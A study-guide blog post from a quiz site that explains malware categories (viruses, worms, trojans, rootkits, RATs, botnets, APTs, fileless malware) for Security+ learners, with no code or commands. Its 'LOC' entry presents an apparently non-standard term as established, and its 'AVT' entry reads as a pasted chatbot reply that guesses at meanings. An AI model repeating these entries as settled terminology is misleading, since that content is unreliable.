CyberQuizzer
Back to Blog

Malware types and classifications: A comprehensive guide

(Updated: August 15, 2025)
Diagram of the Cyber Kill Chain framework

Complete Malware Types & Classifications

Basic Malware Categories

Malware (Umbrella Term)

General term for any malicious software designed to harm, exploit, or gain unauthorized access to systems.

  • Includes: All the types listed below
  • Purpose: Catch-all category for malicious code

Virus

Self-replicating code that attaches to and infects other files or programs.

  • Key trait: Needs a host file to survive and spread
  • Spread method: When infected file is executed or shared
  • Analogy: Like a biological virus that needs a host cell
  • Examples: File infector viruses, macro viruses

Worm

Self-replicating malware that spreads independently across networks without needing a host file.

  • Key trait: Can spread automatically without user action
  • Spread method: Exploits network vulnerabilities, email, USB drives
  • Analogy: Like a parasite that can move between hosts on its own
  • Examples: Conficker, WannaCry, Stuxnet

Trojan (Trojan Horse)

Malware disguised as legitimate software that tricks users into installing it.

  • Key trait: Appears harmless but contains malicious payload
  • Spread method: Social engineering, fake software downloads
  • Analogy: Like the wooden horse from Greek mythology
  • Examples: Remote Access Trojans (RATs), banking trojans

Rootkit

Stealth malware designed to hide its presence and maintain privileged access.

  • Key trait: Operates at system level to avoid detection
  • Purpose: Maintain persistent, hidden access
  • Detection: Very difficult, requires specialized tools
  • Examples: Kernel-level rootkits, bootkit rootkits

Spyware

Surveillance malware that secretly monitors and collects user information.

  • Purpose: Steal passwords, browsing habits, personal data
  • Stealth: Often runs invisibly in background
  • Examples: Keyloggers, screen capture tools, adware

Ransomware

Extortion malware that encrypts data and demands payment for decryption.

  • Method: Encrypt files, display ransom demand
  • Payment: Usually cryptocurrency for anonymity
  • Examples: CryptoLocker, WannaCry, Ryuk

Adware

Advertising malware that displays unwanted advertisements.

  • Purpose: Generate revenue through forced ad displays
  • Annoyance: Pop-ups, browser redirects, slow performance
  • Legality: Sometimes borderline legitimate

Bloatware

Unwanted pre-installed software that comes with new devices or software packages.

  • Characteristics: Takes up space, slows system, hard to remove
  • Examples: Trial software, manufacturer utilities, bundled apps
  • Risk: May contain vulnerabilities or privacy issues
  • Legality: Usually legitimate but unwanted

Keylogger

Monitoring software that records every keystroke made on a system.

  • Purpose: Steal passwords, sensitive information, personal data
  • Types: Hardware keyloggers (physical devices) or software-based
  • Detection: Often runs silently in background
  • Use cases: Both malicious (credential theft) and legitimate (parental controls)

Backdoor

Hidden access method that bypasses normal authentication to access a system.

  • Purpose: Maintain unauthorized access for future use
  • Installation: Often installed by other malware or during initial compromise
  • Stealth: Designed to remain undetected by users and security tools
  • Examples: Hidden user accounts, secret network ports, modified system files

Remote Access Trojan (RAT)

Trojan horse that provides complete remote control of an infected system.

  • Capabilities: File access, screen capture, camera/microphone access, command execution
  • Control: Attacker can control victim's computer as if sitting at it
  • Examples: DarkComet, njRAT, Poison Ivy
  • Detection: Often disguised as legitimate remote administration tools

Logic Bomb

Malicious code that remains dormant until triggered by specific conditions.

  • Triggers: Specific date/time, system events, user actions, file deletions
  • Purpose: Sabotage, revenge, or creating chaos at predetermined time
  • Examples: Activate on employee's termination date, trigger after 30 days
  • Detection: Very difficult to find until activated

Scareware

Fake security software that tricks users into believing their system is infected.

  • Method: Display fake virus warnings, system alerts, security scans
  • Goal: Trick users into purchasing fake antivirus or providing personal information
  • Examples: "Your computer is infected! Buy our antivirus now!"
  • Social engineering: Exploits fear and urgency

Cryptojacking

Unauthorized cryptocurrency mining using victim's computer resources.

  • Method: Installs mining software secretly or runs in web browser
  • Impact: Slow performance, high CPU usage, increased electricity bills
  • Profit: Attacker earns cryptocurrency from victim's computing power
  • Detection: Monitor for unexplained high CPU/GPU usage

Network-Based Malware & Botnets

Zombie (Bot)

Infected computer under remote control by cybercriminals.

  • Control: Operates without user knowledge, follows commands
  • Capabilities: Send spam, launch attacks, mine cryptocurrency, steal data
  • Network: Usually part of larger botnet
  • Infection: Through malware, viruses, trojans, or exploits

Botnet

Network of infected computers (zombies) controlled centrally by cybercriminals.

  • Scale: Can include thousands to millions of infected devices
  • Uses: DDoS attacks, spam distribution, cryptocurrency mining, credential theft
  • Examples: Conficker, Zeus, Mirai (IoT botnet)
  • Control: Managed through Command and Control (C&C) servers

LOC (Low-Observable Characteristics)

Stealth techniques used by advanced malware to avoid detection by security systems.

  • Purpose: Remain hidden from antivirus, EDR, and security monitoring
  • Techniques:
    • Living off the land: Using legitimate system tools (PowerShell, WMI, certutil)
    • Process hollowing: Injecting malicious code into legitimate processes
    • Fileless operation: Operating entirely in memory
    • Encrypted communications: Hiding C&C traffic in legitimate protocols
    • Timing attacks: Operating only during specific hours or conditions
  • Examples: APTs, advanced rootkits, state-sponsored malware
  • Detection: Requires behavioral analysis and advanced threat hunting

File Infector Virus

Traditional virus that infects executable files (.exe, .com files).

  • Method: Attaches to program files
  • Activation: When infected program runs
  • Spread: Through file sharing, infected software

Boot Sector Virus

System-level virus that infects the master boot record (MBR) or boot sectors.

  • Location: Disk boot areas that load before operating system
  • Impact: Can prevent system from starting
  • Persistence: Very hard to remove, loads before antivirus

Macro Virus

Document-based virus that uses macros in office documents.

  • Target: Word, Excel, PowerPoint files
  • Method: Malicious VBA (Visual Basic) code in documents
  • Spread: Email attachments, shared documents
  • Examples: Melissa virus, I LOVE YOU worm

Script Virus

Interpreted code viruses using scripting languages.

  • Languages: JavaScript, VBScript, PowerShell, Python, batch files
  • Method: Malicious scripts that execute when opened
  • Common: Email attachments with .js, .vbs, .ps1 extensions

Fileless Malware

Memory-resident malware that operates without creating files on disk.

  • Method: Lives entirely in RAM, registry, or legitimate processes
  • Detection: Very difficult for traditional antivirus
  • Persistence: Uses legitimate system tools (PowerShell, WMI)
  • Examples: Living-off-the-land attacks

Memory-Resident Malware

RAM-based malware that stays active in system memory.

  • Persistence: Remains active even after initial infection
  • Advantage: Faster execution, harder to detect
  • Vulnerability: Lost when system reboots (unless has persistence mechanism)

Advanced Persistent Threats

APT (Advanced Persistent Threat)

Sophisticated, long-term cyberattack typically by nation-states or organized groups.

  • Characteristics:
    • Advanced: Uses zero-day exploits, custom malware
    • Persistent: Maintains long-term access (months/years)
    • Threat: Highly skilled, well-funded attackers
  • Goals: Espionage, intellectual property theft, strategic advantage
  • Examples: APT1 (China), Cozy Bear (Russia), Lazarus Group (North Korea)
  • Tactics: Social engineering, supply chain attacks, living-off-the-land

AVT (Advanced Volatile Threat)

Note: This is not a standard cybersecurity term. You might mean:

  • Advanced Virus Threat: Sophisticated virus variants
  • Advanced Vulnerability Threat: Exploits using advanced techniques
  • If this was from specific training material, could you clarify the context?

Quick Comparison Table

| Type | Self-Replicate | Needs Host | Network Spread | Stealth Level | Primary Goal | |------|---------------|------------|----------------|---------------|--------------| | Virus | Yes | Yes | No | Medium | Infect files | | Worm | Yes | No | Yes | Medium | Network spread | | Trojan | No | No | No | Medium | Deception/Access | | Rootkit | No | No | No | Very High | Hidden access | | Ransomware | Sometimes | No | Sometimes | Medium | Extortion | | Spyware | No | No | No | High | Data theft | | Keylogger | No | No | No | High | Keystroke capture | | RAT | No | No | Sometimes | Medium | Remote control | | Backdoor | No | No | No | Very High | Hidden access | | Logic Bomb | No | Yes | No | Very High | Time-delayed damage | | Botnet | Via bots | No | Yes | Medium | Distributed control | | Cryptojacking | Sometimes | No | Sometimes | High | Mining cryptocurrency | | Fileless | Varies | No | Varies | Very High | Evasion |

Modern Malware Trends

Hybrid Malware

  • Combines multiple techniques (e.g., worm + ransomware)
  • More effective and harder to classify

Polymorphic Malware

  • Changes its code signature to evade detection
  • Each infection looks different to antivirus

Metamorphic Malware

  • Completely rewrites itself with each infection
  • Most advanced evasion technique

AI-Powered Malware

  • Uses artificial intelligence for targeting and evasion
  • Adapts behavior based on environment

Key Distinctions for Security+

Virus vs Worm

  • Virus: Needs host file, spreads when host is shared
  • Worm: Self-sufficient, spreads automatically across networks

Trojan vs Virus

  • Trojan: Doesn't replicate, tricks user into installation
  • Virus: Replicates and spreads to other files/systems

Malware vs Virus

  • Malware: Umbrella term for all malicious software
  • Virus: Specific type of malware that replicates via host files

APT vs Regular Malware

  • APT: Sophisticated, persistent, targeted, state-sponsored
  • Regular Malware: Often automated, widespread, financially motivated

Fileless vs File-based

  • Fileless: Operates in memory/registry, harder to detect
  • File-based: Creates files on disk, easier for antivirus to find
Diagram of the Cyber Kill Chain framework

Test Your Knowledge

Ready to apply what you've learned? Take a quiz and test your understanding of these concepts.

Take a Quiz